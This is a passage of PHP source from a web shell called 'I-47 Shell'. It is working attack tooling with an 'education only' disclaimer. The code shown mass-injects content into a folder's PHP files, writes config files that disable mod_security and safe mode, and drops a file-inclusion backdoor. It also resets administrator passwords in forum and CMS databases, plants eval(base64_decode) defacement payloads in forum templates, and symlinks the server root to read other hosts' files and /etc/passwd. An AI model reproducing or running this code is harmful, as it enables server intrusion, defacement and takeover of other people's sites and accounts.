1303    echo '<a href="'.$self."?$href\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.' < / font > < / b > < / a > ';
1304    $i++;
1305   }
1306 
1307       ?></font></td><?php } ?>
1308       <td style="width:20%;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
1309       <td>Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
1310       
1311   </tr>
1312   </table>
1313   
1314 
1315 <table border="3" width="100%;" cellpadding="2">
1316   <tr>
1317       <td style="border:none;"><a href="<?php echo $self.' ? symlinkserver'?>"><font color="#FF0000">Symlink</font></a></td>
1318       <td style="border:none;"><a href="<?php echo $self.' ? forum'?>"><font color="#FF0000">Forum</font></a></td>
1319       <td style="border:none;"><a href="<?php echo $self.' ? secinfo'?>"><font color="#FF0000">Sec. Info</font></a></td>
1320       <td style="border:none;"><a href="<?php echo $self.' ? injector'?>"><font color="#FF0000">Code Inject</font></a></td>
1321       <td style="border:none;"><a href="<?php echo $self.' ? bypass';?>"><font color="#FF0000">Bypassers</font></a></td>
1322       <td style="border:none;"><a href="<?php echo $self.' ? fuzz'?>"><font color="#FF0000">Server Fuzzer</font></a></td>
1323       <td style="border:none;"><a href="<?php echo $self.' ? zone'?>"><font color="#FF0000">Zone-h</font></a></td>
1324       <td style="border:none;"><a href="<?php echo $self.' ? phpproxy'?>"><font color="#FF0000">Proxy</font></a></td>
1325       <td style="border:none;"><a href="<?php echo $self.' ? dos';?>"><font color="#FF0000">DoS</font></a></td>
1326       <td style="border:none;"><a href="<?php echo $self.' ? mailbomb'?>"><font color="#FF0000">Mail</font></a></td>
1327       <td style="border:none;"><a href="<?php echo $self.' ? tools'?>"><font color="#FF0000">Tools</font></a></td>
1328       <td style="border:none;"><a href="<?php echo $self.' ? phpc';?>"><font color="#FF0000">PHP</font></a></td>
1329       <td style="border:none;"><a href="<?php echo $self.' ? exploit'?>"><font color="#FF0000">Exploit</font></a></td>
1330       <td style="border:none;"><a href="<?php echo $self.' ? connect'?>"><font color="#FF0000">Connect</font></a></td>
1331       <td style="border:none;"><a href="<?php echo $self.' ? database'?>"><font color="#FF0000">SQL</font></a></td>
1332       <td style="border:none;"><a href="<?php echo $self.' ? about'?>"><font color="#FF0000">About</font></a></td>
1333       <td style="border:none;"><a href="<?php echo $self.' ? selfkill'?>" onClick="if(confirm('AreYouSureYouWantToKillThisShell ? ')){return true;}else{return false;}"><font color="#FF0000">SelfKill</font></a></td>
1334       <td style="border:none;"><a href="<?php echo $self.' ? logout'?>"><font color="#FF0000">LogOut</font></a></td>
1335   </tr>
1336 </table>
1337 
1338 
1339 <table align="center" style="width:95%; background-color:#0C0C0C; -moz-border-radius:25px;"><br>
1340     <tr>
1341         <form method="GET"  action="<?php echo $self; ?>">
1342         <td style="width:35%;" align="right"> &nbsp;Present Working Directory : </td><td style="width:20%;"><input name="dir" class="box" style="width:300px;" value="<?php if($dir == null){echo getcwd();} else { echo $dir; } ?>"/></td>
1343         <td><input type="submit" value="  Go  " class="but" /></td><td align="right"><?php if($os == "Linux") { ?>
1344       <a href="<?php echo $self.' ? downloadit'; ?>"><font color="#FF0000">Download It</font></a><?php } ?></td>
1345         </form>
1346     </tr>
1347 </table>
1348 
1349 <?php
1350 
1351 if(isset($_POST['pathtomass']) &&  $_POST['pathtomass'] != '' &&  isset($_POST['filetype']) &&  $_POST['filetype'] != '' &&  isset($_POST['mode']) &&  $_POST['mode'] != '' && isset($_POST['injectthis']) &&  $_POST['injectthis'] != '')
1352     {
1353         //$dir = $_GET['dir'];
1354         $filetype = $_POST['filetype'];
1355         //$message = $_GET['message'];
1356         
1357         $mode = "a"; //default mode
1358         
1359         
1360         // Modes Begin
1361         
1362         if($_POST['mode'] == 'Apender')
1363         {
1364             $mode = "a";
1365         }
1366         if($_POST['mode'] == 'Overwriter')
1367         {
1368             $mode = "w";
1369         }
1370         
1371         if ($_POST['filetype'] == 'php') 
1372       {
1373           if (is_dir($_POST['pathtomass'])) 
1374           {
1375               $lolinject = $_POST['injectthis'];
1376               foreach (glob($_POST['pathtomass'] . $directorysperator . "*.php") as $injectj00) 
1377               {
1378                   $fp=fopen($injectj00,$mode);
1379                   if (fputs($fp,$lolinject)){
1380                       echo ' < br > < fontcolor = limesize = 3 > '.$injectj00.'wasinjected < br > < / font > ';
1381               } else {
1382                       echo ' < fontcolor = redsize = 3 > failedtoinject'.$injectj00.' < / font > ';
1383               }
1384           }
1385       } else 
1386           { //end if inputted dir is real -- if not, show an ugly red error
1387           echo ' < b > < fontcolor = red > '.$_POST['pathtomass'].'isnotavailable! < / font > < / b > ';
1388           } // end if inputted dir is real, for real this time
1389       } // end if confirmation to mass sploit is php only
1390   } // end if massbrowsersploit is called
1391 
1392 
1393 
1394 if(isset($_GET['to']) && isset($_GET['file']))
1395 {
1396      if(!rename($_GET['file'], $_GET['to']))
1397      {
1398       $loc = $_SERVER["SCRIPT_NAME"] . "?dir=" . $_GET['getdir'];
1399       header("Location:$loc");
1400       ob_end_flush();
1401        
1402      }
1403      else
1404      {
1405       $loc = $_SERVER["SCRIPT_NAME"] . "?dir=" . $_GET['getdir'];
1406       header("Location:$loc");
1407       ob_end_flush();
1408         
1409      }
1410 }
1411 
1412   
1413   if(isset($_POST["changeperms"]))
1414   {
1415       if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
1416       {
1417           $perms = 0; 
1418             for($i=strlen($_POST['chmode'])-1;$i>=0;--$i) 
1419                 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1)); 
1420           if(@chmod($_POST['myfilename'],$perms))
1421               echo "<center><blink><font size=3 color=lime>File Permissions Changed Successfully</font></blink></center>";
1422           else
1423               echo "<center><blink><font size=3 color=red>Cannot Change File Permissions</font></blink></center>";
1424       }
1425   }
1426   
1427 $setuploadvalue = 0;
1428 if(isset($_POST['u']))
1429   {
1430       $path = $_REQUEST['path'];
1431       if(is_dir($path))
1432         {
1433             $uploadedFilePath = $_FILES['uploadfile']['name'];
1434           //echo $uploadedFilePath;
1435             $tempName = $_FILES['uploadfile']['tmp_name'];
1436           //echo $tempName;
1437           if($os == "Windows")
1438               $uploadPath = $path . $directorysperator .  $uploadedFilePath;
1439           else if($os == "Linux")
1440                $uploadPath = $path . $directorysperator . $uploadedFilePath;
1441           if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
1442             {
1443                echo "<center><font color=lime size=3><blink>File uploaded to $uploadPath</blink></font></center>";  
1444              //header("Location:");         
1445             }
1446             else
1447             {
1448                 echo "<center><font color=red size=3><blink>Failed to upload file to $uploadPath</blink></font></center>";
1449             }
1450          }
1451   }
1452       
1453   if(isset($_POST['createdir']))
1454   {
1455       if(!mkdir($_POST['createfolder']))
1456           echo "Failed To create";
1457   }
1458 if(isset($_POST['createmyfile'])&&isset($_POST['filecontent']))
1459 {
1460   $content = $_POST['filecontent'];
1461   $file_pointer = fopen($_POST['filecreator'], "w+");
1462   fwrite($file_pointer, $content); 
1463   fclose($file_pointer);
1464   $loc = $_SERVER['REQUEST_URI'];
1465   header("Location:$loc");
1466   ob_end_flush();
1467 }
1468 
1469 
1470 //Turn Safe Mode Off
1471 
1472   if(getDisabledFunctions() != "None" || safe() != "OFF")
1473   {
1474       $file_pointer = fopen(".htaccess", "w+");
1475       fwrite($file_pointer, "<IfModule mod_security.c>
1476                   SecFilterEngine Off
1477                        SecFilterScanPOST Off
1478                   </IfModule>"); 
1479           
1480       $file_pointer = fopen("ini.php", "w+");
1481       fwrite($file_pointer, "<?
1482 echo ini_get(\"safe_mode\");
1483 echo ini_get(\"open_basedir\");
1484 include(\$_GET[\"file\"]);
1485 ini_restore(\"safe_mode\");
1486 ini_restore(\"open_basedir\");
1487 echo ini_get(\"safe_mode\");
1488 echo ini_get(\"open_basedir\");
1489 include(\$_GET[\"ss\"]);
1490 ?>"); 
1491 
1492       $file_pointer = fopen("php.ini", "w+");
1493       fwrite($file_pointer, "safe_mode               =       Off"); 
1494                   
1495       fclose($file_pointer); 
1496       //echo "Safe Mode Is Now Off..";
1497     }
1498   
1499   if(isset($_GET["downloadit"]))
1500   {
1501       $FolderToCompress = getcwd(); 
1502       execmd("tar --create --recursion --file=backup.tar $FolderToCompress"); 
1503       
1504       $prd=explode("/","backup.tar");
1505       for($i=0;$i<sizeof($prd);$i++)
1506       {
1507           $nfd=$prd[$i];
1508       }
1509       @ob_clean(); 
1510      header("Content-type: application/octet-stream"); 
1511      header("Content-length: ".filesize($nfd)); 
1512      header("Content-disposition: attachment; filename=\"".$nfd."\";"); 
1513          readfile($nfd);
1514 
1515          exit;
1516   }
1517   
1518   ?>
1519   <a href="javascript:history.back(1)"><font color=lime size="3"> [Back] </font></a>&nbsp;
1520   <a href="javascript:history.go(1)"><font color=lime size="3"> [Forward] </font></a>&nbsp;
1521   <a href=""><font color=lime size="3"> [Refresh] </font></a>&nbsp;
1522   <?php 
1523   
1524   if(isset($_POST['uploadurl']))
1525   { 
1526       $functiontype = trim($_POST['functiontype']); 
1527       $wurl = trim($_POST['wurl']); 
1528       $path = magicboom($_POST['path']); 
1529       $namafile = remotedownload($functiontype,$wurl); 
1530       $fullpath = $path . $directorysperator . $namafile; 
1531       if(is_file($fullpath)) 
1532       { 
1533           echo "<center><font color=lime size=3>File uploaded to $fullpath</font></center>"; 
1534       } 
1535       else 
1536           echo "<center><font color=red size=3>Failed to upload $namafile</font></center>"; 
1537   }
1538   
1539   // Install Php Proxy
1540   if (isset($_GET["phpproxy"]))
1541   {
1542       ?><br><center><table cellpadding="5" border="1" style="width:60%;">
1543       <tr><td colspan="2" align="center">
1544       <font color="#FF0000" size="4">Install PHP Based Proxy</font></td></tr><tr><td style="height:60px;" align="right">
1545       <form action=<?php echo $self; ?> method=GET>
1546       <input type=hidden name="act" value="phpproxy">
1547       <input type=hidden name="install" value="yup">
1548       <font color="#FF0000" size="3">Path to install in:</td><td><input type=text class="box" name="path" value="<?php echo $dir; ?>"> (must have final /)</td></font></tr><tr><td colspan="2" align="center" style="height:40px;">
1549       <input type=submit value="Install" class="but"></form></td></tr></table></center><br>
1550   <?php } 
1551   else if(isset($_GET['install'])) 
1552   {
1553       if (is_writable($_GET['path'])) 
1554       {
1555           @$fh=fopen($_GET['path'].'proxy . php','w');
1556           @fwrite($fh,gzinflate(base64_decode($phpproxy)));
1557           @fclose($fh);
1558           
1559           echo ' < br > < center > < blink > < fontcolor = limesize = 3 > proxy . phpwascreatedin'.htmlentities($_GET['path']).' < / font > < / blink > < / center > < br > < br > ';
1560           chmod($_GET['path'].' / proxy . php', 0777);
1561       }else{
1562           echo ' < br > < center > < fontcolor = redsize = 3 > < b > Directoryisnotwritable! < / b > < br > < / font > < / center > < br > ';
1563       }
1564   }
1565   
1566   else if(isset($_GET['about']))
1567   { ?>
1568       <bR><center>
1569         <p><font color=red size=6><u>I-47 Shell v1.3</u></font><br>
1570             <font color=red size=5>[--==Coded By Arjun==--]</font><br>
1571           <br><font class="txt"><pre>
1572 ================================
1573   -----           /   -------
1574      |          /           /
1575     |    ___  /___|       /
1576    |             |      /
1577 -----           |     /
1578 
1579 ================================
1580 
1581       </pre></font></center>
1582   <font class="txt">I-47 Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerabilities present in the web server. This shell provides you almost every facility that the security analyst needs for penetration testing. This is an "All In One" PHP script, so that the user does not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purposes or testing on your own server. The developer of the script is not responsible for any damage or misuse of it</font><br><br><center><font color=red size=5>GREETZ To All Indian Hackers</font><br><font color=red size=6>| &#2332;&#2351; &#2361;&#2367;&#2344;&#2381;&#2342; |</font></center><br>
1583   <?php }
1584   
1585   // Zone-h Poster
1586   else if(isset($_GET["zone"]))
1587   {  
1588       if(!function_exists('curl_version'))
1589       {
1590           echo "<pre class=ml1 style='margin-top: 5px'><center><font color=red>PHP CURL DOES NOT EXIST</font></center></pre>";
1591       }
1592       ?>
1593       <center><font size="4" color="#FF0000">Zone-h Poster</font></center>
1594       <form action="<?php echo $self; ?>" method="post">
1595       <table align="center" cellpadding="5" border="0">
1596       <tr>
1597       <td>
1598       <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
1599       <tr><td>
1600       <select name="hackmode" class="box">
1601           <option >--------SELECT--------</option>
1602           <option value="1">known vulnerability (i.e. unpatched system)</option>
1603           <option value="2" >undisclosed (new) vulnerability</option>
1604           <option value="3" >configuration / admin. mistake</option>
1605           <option value="4" >brute force attack</option>
1606           <option value="5" >social engineering</option>
1607           <option value="6" >Web Server intrusion</option>
1608           <option value="7" >Web Server external module intrusion</option>
1609           <option value="8" >Mail Server intrusion</option>
1610           <option value="9" >FTP Server intrusion</option>
1611           <option value="10" >SSH Server intrusion</option>
1612           <option value="11" >Telnet Server intrusion</option>
1613           <option value="12" >RPC Server intrusion</option>
1614           <option value="13" >Shares misconfiguration</option>
1615           <option value="14" >Other Server intrusion</option>
1616           <option value="15" >SQL Injection</option>
1617           <option value="16" >URL Poisoning</option>
1618           <option value="17" >File Inclusion</option>
1619           <option value="18" >Other Web Application bug</option>
1620           <option value="19" >Remote administrative panel access bruteforcing</option>
1621           <option value="20" >Remote administrative panel access password guessing</option>
1622           <option value="21" >Remote administrative panel access social engineering</option>
1623           <option value="22" >Attack against administrator(password stealing/sniffing)</option>
1624           <option value="23" >Access credentials through Man In the Middle attack</option>
1625           <option value="24" >Remote service password guessing</option>
1626           <option value="25" >Remote service password bruteforce</option>
1627           <option value="26" >Rerouting after attacking the Firewall</option>
1628           <option value="27" >Rerouting after attacking the Router</option>
1629           <option value="28" >DNS attack through social engineering</option>
1630           <option value="29" >DNS attack through cache poisoning</option>
1631           <option value="30" >Not available</option>
1632       </select>
1633       </td></tr>
1634       <tr><td>
1635       <select name="reason" class="box">
1636           <option >--------SELECT--------</option>
1637           <option value="1" >Heh...just for fun!</option>
1638           <option value="2" >Revenge against that website</option>
1639           <option value="3" >Political reasons</option>
1640           <option value="4" >As a challenge</option>
1641           <option value="5" >I just want to be the best defacer</option>
1642           <option value="6" >Patriotism</option>
1643           <option value="7" >Not available</option>
1644       </select></td></tr>
1645       <tr><td>
1646       <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
1647       <tr><td>
1648       <input type="submit" class="but" value="Send Now !" name="SendNowToZoneH" /></td></tr></table>
1649       </form>
1650   <?php }
1651   
1652   // Password Change Forums
1653   else if(isset($_POST['forumpass']))
1654   {
1655       $localhost =  $_POST['f1']; 
1656       $database =  $_POST['f2']; 
1657       $username =  $_POST['f3']; 
1658       $password =  $_POST['f4']; 
1659       $prefix    =  $_POST['prefix'];
1660       $uid = $_POST['uid'];
1661       $newpass = $_POST['newpass'];
1662       if($_POST['forums'] == "vb")
1663       {   
1664           $con = mysql_connect($localhost,$username,$password);
1665           $db = mysql_select_db($database,$con);
1666           $salt = "eghjghrtd";
1667           $newpassword = md5(md5($newpass) . $salt);
1668           if($prefix == "" || $prefix == null)
1669               $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1670           else
1671               $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1672           if($sql)
1673           {
1674               mysql_close($con);
1675               header("Location:$self?forum&passwordchange&changed");
1676               ob_end_flush();
1677           }
1678           else
1679               header("Location:$self?forum&passwordchange&cannotchange");
1680       }
1681       if($_POST['forums'] == "mybb")
1682       {   
1683           $con = mysql_connect($localhost,$username,$password);
1684           $db = mysql_select_db($database,$con);
1685           $salt = "jeghj";
1686           $newpassword = md5(md5($salt).$newpass);
1687           if($prefix == "" || $prefix == null)
1688               $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1689           else
1690               $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1691           if($sql)
1692           {
1693               mysql_close($con);
1694               header("Location:$self?forum&passwordchange&changed");
1695               ob_end_flush();
1696           }
1697           else
1698               header("Location:$self?forum&passwordchange&cannotchange");
1699       }
1700       if($_POST['forums'] == "smf")
1701       {   
1702           $con = mysql_connect($localhost,$username,$password);
1703           $db = mysql_select_db($database,$con);
1704           $salt = "eghj";
1705               
1706           if($prefix == "" || $prefix == null)
1707           {
1708               $result = mysql_query("select member_name from smf_members where id_member = 1");
1709               $row = mysql_fetch_array($result);
1710               $membername = $row['member_name'];
1711               $newpassword = sha1(strtolower($membername).$newpass);
1712               $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
1713           }
1714           else
1715           {
1716               $result = mysql_query("select member_name from ".$prefix."members where id_member = 1");
1717               $row = mysql_fetch_array($result);
1718               $membername = $row['member_name'];
1719               $newpassword = sha1(strtolower($membername).$newpass);
1720               $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
1721           }
1722           if($sql)
1723           {
1724               mysql_close($con);
1725               header("Location:$self?forum&passwordchange&changed");
1726               ob_end_flush();
1727           }
1728           else
1729               header("Location:$self?forum&passwordchange&cannotchange");
1730       }
1731       if($_POST['forums'] == "phpbb")
1732       {   
1733           $con = mysql_connect($localhost,$username,$password);
1734           $db = mysql_select_db($database,$con);
1735           
1736           $newpassword = md5($newpass);echo $newpassword;
1737           if(empty($prefix) || $prefix == null)
1738               $sql = mysql_query("update phpbb_users set user_password = '$newpassword' where user_id = '$uid'");
1739           else
1740               $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
1741           if($sql)
1742           {
1743               mysql_close($con);
1744               header("Location:$self?forum&passwordchange&changed");
1745               ob_end_flush();
1746           }
1747           else
1748               header("Location:$self?forum&passwordchange&cannotchange");
1749       }
1750       if($_POST['forums'] == "ipb")
1751       {   echo "gjhfg";
1752           $con = mysql_connect($localhost,$username,$password);
1753           $db = mysql_select_db($database,$con);
1754           $salt = "eghj";
1755           $newpassword = md5(md5($salt).md5($newpass));
1756           if($prefix == "" || $prefix == null)
1757               $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1758           else
1759               $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1760           if($sql)
1761           {
1762               mysql_close($con);
1763               header("Location:$self?forum&passwordchange&changed");
1764               ob_end_flush();
1765           }
1766           else
1767               header("Location:$self?forum&passwordchange&cannotchange");
1768       }
1769       if($_POST['forums'] == "wp")
1770       {   
1771           $uname = $_POST['uname'];
1772           $con = mysql_connect($localhost,$username,$password);
1773           $db = mysql_select_db($database,$con);
1774 
1775           $newpassword = md5($newpass);
1776           if($prefix == "" || $prefix == null)
1777               $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1778           else
1779               $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1780           if($sql)
1781           {
1782               mysql_close($con);
1783               header("Location:$self?forum&passwordchange&changed#wordp");
1784               ob_end_flush();
1785           }
1786           else
1787               header("Location:$self?forum&passwordchange&cannotchange#wordp");
1788       }
1789       if($_POST['forums'] == "joomla")
1790       {   
1791           $uname = $_POST['uname'];
1792           $con = mysql_connect($localhost,$username,$password);
1793           $db = mysql_select_db($database,$con);
1794 
1795           $newpassword = md5($newpass);
1796           if($prefix == "" || $prefix == null)
1797               $sql = mysql_query("update jos_users set password = '$newpassword', username = '$uname' where name = 'SuperUser'");
1798           else
1799               $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$uname' where name = 'SuperUser' OR name = 'Administrator'");
1800           if($sql)
1801           {
1802               mysql_close($con);
1803               header("Location:$self?forum&passwordchange&changed#jooml");
1804               ob_end_flush();
1805           }
1806           else
1807               header("Location:$self?forum&passwordchange&cannotchange#jooml");
1808       }
1809   }
1810   
1811   // Deface Forums
1812   else if(isset($_POST['forumdeface']))
1813   {
1814       $localhost =  $_POST['f1']; 
1815       $database =  $_POST['f2']; 
1816       $username =  $_POST['f3']; 
1817       $password =  $_POST['f4']; 
1818       $index    =  $_POST['index'];
1819       $prefix    =  $_POST['prefix'];
1820       if($_POST['forumdeface'] == "Hack VB")
1821       {
1822           if($database=$_POST['f2'])
1823           {
1824               $con =@ mysql_connect($localhost,$username,$password) or die; 
1825               $db =@ mysql_select_db($database,$con) or die;  
1826               $index=str_replace('"','\"',$index); 
1827               $attack  = " {
1828                             \$ {
1829                                 eval(base64_decode(\'"; 
1830               $attack .= base64_encode("echo \"$index\";"); 
1831               $attack .= "\'))}}{\${exit()}}</textarea>"; 
1832               if($prefix == "" || $prefix == null)
1833                   $query = "UPDATE template SET template = '$attack'" or die; 
1834               else
1835                   $query = "UPDATE ".$prefix."template SET template = '$attack'" or die; 
1836               $result =@ mysql_query($query,$con); 
1837               if($result)
1838               { 
1839                   echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
1840               }
1841               else
1842               {
1843                   echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1844               }
1845           }
1846       }
1847       else if($_POST['forumdeface'] == "Hack MyBB")
1848       {
1849           $localhost =  $_POST['f1']; 
1850           $database =  $_POST['f2']; 
1851           $username =  $_POST['f3']; 
1852           $password =  $_POST['f4']; 
1853           $index    =  $_POST['index'];
1854           $prefix    =  $_POST['prefix'];
1855           if($database=$_POST['f2'])
1856           {
1857               $con =@ mysql_connect($localhost,$username,$password) or die; 
1858               $db =@ mysql_select_db($database,$con) or die;  
1859               //$index=str_replace('"','\"',$index); 
1860               $attack  = " {
1861                                     \$ {
1862                                         eval(base64_decode(\'"; 
1863               $attack .= base64_encode("echo \"$index\";"); 
1864               $attack .= "\'))}}{\${exit()}}</textarea>"; 
1865               $attack  = str_replace('"',"\'",$attack);
1866           
1867               if($prefix == "" || $prefix == null)
1868                   $query = "UPDATE mybb_templates SET template = '$attack'" or die; 
1869               else
1870                   $query = "UPDATE ".$prefix."templates SET template = '$attack'" or die; 
1871               $result =@ mysql_query($query,$con);
1872               if($result)
1873               { 
1874                   echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
1875               }
1876               else
1877               {
1878                   echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1879               }
1880           }
1881       }
1882       else if($_POST['forumdeface'] == "Hack SMF")
1883       {
1884           $localhost =  $_POST['f1']; 
1885           $database =  $_POST['f2']; 
1886           $username =  $_POST['f3']; 
1887           $password =  $_POST['f4']; 
1888           $index    =  $_POST['index'];
1889           $prefix    =  $_POST['prefix'];
1890           if($database = $_POST['f2'])
1891           {
1892               $con =@ mysql_connect($localhost,$username,$password) or die; 
1893               $db =@ mysql_select_db($database,$con) or die;  
1894               if($prefix == "" || $prefix == null)
1895                   $query = "UPDATE smf_categories SET name='$index' WHERE id_cat='$catid'" or die; 
1896               else
1897                   $query = "UPDATE ".$prefix."categories SET name='$index' WHERE id_cat='$catid'" or die; 
1898               $result =@ mysql_query($query,$con);
1899               if($result)
1900               { 
1901                   echo "<center><font color=lime size=4><blink>Forum Index Changed Successfully</blink></font></center>";
1902               }
1903               else
1904               {
1905                   echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1906               }
1907           }
1908       }
1909       else if($_POST['forumdeface'] == "Hack IPB")
1910       {
1911           $localhost =  $_POST['f1']; 
1912           $database =  $_POST['f2']; 
1913           $username =  $_POST['f3']; 
1914           $password =  $_POST['f4']; 
1915           $index    =  $_POST['index'];
1916           if($database=$_POST['f2'])
1917           {
1918               $IPB = "ibf_skin_sets";
1919               $con =@ mysql_connect($localhost,$username,$password) or die; 
1920               $db =@ mysql_select_db($database,$con) or die;  
1921               $query = "UPDATE $IPB SET set_cache_wrapper = '$index'" or die; 
1922               $result =@ mysql_query($query,$con);
1923               if($result)
1924               { 
1925                   echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
1926               }
1927               else
1928               {
1929                   echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1930               }
1931           }
1932       }
1933       else if($_POST['forumdeface'] == "Hack wordpress")
1934       {
1935           $localhost =  $_POST['f1']; 
1936           $database =  $_POST['f2']; 
1937           $username =  $_POST['f3']; 
1938           $password =  $_POST['f4']; 
1939           $catid = $_POST['f5'];
1940           $index    =  $_POST['index'];
1941           $prefix    =  $_POST['prefix'];
1942           if($database=$_POST['f2'])
1943           {
1944               $con =@ mysql_connect($localhost,$username,$password) or die; 
1945               $db =@ mysql_select_db($database,$con) or die;  
1946               if($prefix == "" || $prefix == null)
1947                   $query = "UPDATE wp_posts SET post_title='$index' WHERE ID='$catid'" or die; 
1948               else
1949                   $query = "UPDATE ".$prefix."posts SET post_title='$index' WHERE ID='$catid'" or die;
1950               $result =@ mysql_query($query,$con);
1951               if($result)
1952               { 
1953                   echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
1954               }
1955               else
1956               {
1957                   echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1958               }
1959           }
1960       }
1961   }
1962   
1963   
1964   // Get Domains
1965   else if(isset($_REQUEST["symlinkserver"]))
1966   {
1967       ?>
1968       <center><table><tr><td><a href="<?php echo $self; ?>?domains&symlinkserver"><font color="lime" size="4">| Get Domains |</font></a></td>
1969       <td><a href="<?php echo $self; ?>?users&symlinkserver"><font color="lime" size="4">| Users & Domains |</font></a></td>
1970       <td><a href="<?php echo $self; ?>?symlink&symlinkserver"><font color="lime" size="4">| Symlink Server |</font></a></td>
1971       <td><a href="<?php echo $self; ?>?symlinkfile&symlinkserver"><font color="lime" size="4">| Symlink File |</font></a></td>
1972       <td><a href="<?php echo $self; ?>?script&symlinkserver"><font color="lime" size="4">| Script Locator |</font></a></td>
1973       </tr></table></center><br>
1974       <?php 
1975       if(isset($_GET["domains"])) 
1976       {
1977       ?>   <center><iframe src="<?php echo 'http : //sameip.org/ip/' . getenv('SERVER_ADDR');
1978                                          ?>" width="80%" height="1000px"></iframe></center>
1979        <?php
1980                                     } else if (isset($_GET["users"])) {
1981                                         $d0mains = @file("/etc/named.conf");
1982                                         if (!$d0mains) {
1983                                             die("<center><font size=4 color=red>cannot ReaD -> [ /etc/named.conf ]</font><center>");
1984                                         }
1985                                         $url = 'http://' . $_SERVER['SERVER_NAME'];
1986                                         echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Domains</font></td><td align=center><font size=4 color=red>Users</font></td></tr>";
1987                                         foreach ($d0mains as $d0main) {
1988                                             if (eregi("zone", $d0main)) {
1989                                                 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1990                                                 flush();
1991                                                 if (strlen(trim($domains[1][0])) > 2) {
1992                                                     $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
1993                                                     echo "<tr><td><a href=http://www." . $domains[1][0] . "/><font size=3 color=lime>" . $domains[1][0] . "</font></a></td><td><font size=3 color=lime>" . $user['name'] . "</font></td></tr>";
1994                                                     flush();
1995                                                 }
1996                                             }
1997                                         }
1998                                         echo "</table>";
1999                                     } else if (isset($_GET["symlink"])) {
2000                                         $d0mains = @file("/etc/named.conf");
2001                                         if ($d0mains) {
2002                                             @mkdir("I47", 0777);
2003                                             @chdir("I47");
2004                                             execmd("ln -s / root");
2005                                             $file3 = 'Options all 
2006    DirectoryIndex Sux.html 
2007    AddType text/plain .php 
2008    AddHandler server-parsed .php 
2009     AddType text/plain .html 
2010    AddHandler txt .html 
2011    Require None 
2012    Satisfy Any        
2013   ';
2014                                             $fp3 = fopen('.htaccess', 'w');
2015                                             $fw3 = fwrite($fp3, $file3);
2016                                             @fclose($fp3);
2017                                             echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Domains</font></td><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
2018                                             foreach ($d0mains as $d0main) {
2019                                                 if (eregi("zone", $d0main)) {
2020                                                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
2021                                                     flush();
2022                                                     if (strlen(trim($domains[1][0])) > 2) {
2023                                                         $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
2024                                                         echo "<tr><td><a href=http://www." . $domains[1][0] . "/><font size=3 color=lime>" . $domains[1][0] . "</font></a></td><td><font size=3 color=lime>" . $user['name'] . "</font></td><td><a href='/I47/root/home/" . $user['name'] . "/public_html' target='_blank'><font size=3 color=lime>Symlink</font></a></td></tr>";
2025                                                         flush();
2026                                                     }
2027                                                 }
2028                                             }
2029                                             echo "</table>";
2030                                         } else {
2031                                             $TEST = @file('/etc/passwd');
2032                                             if ($TEST) {
2033                                                 @mkdir("I47", 0777);
2034                                                 @chdir("I47");
2035                                                 execmd("ln -s / root");
2036                                                 $file3 = 'Options all 
2037            DirectoryIndex Sux.html 
2038            AddType text/plain .php 
2039            AddHandler server-parsed .php 
2040             AddType text/plain .html 
2041            AddHandler txt .html 
2042            Require None 
2043            Satisfy Any        
2044           ';
2045                                                 $fp3 = fopen('.htaccess', 'w');
2046                                                 $fw3 = fwrite($fp3, $file3);
2047                                                 @fclose($fp3);
2048                                                 echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
2049                                                 $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
2050                                                 //Output a line of the file until the end is reached
2051                                                 while (!feof($file)) {
2052                                                     $s = fgets($file);
2053                                                     $matches = array();
2054                                                     $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2055                                                     $matches = str_replace("home/", "", $matches[1]);
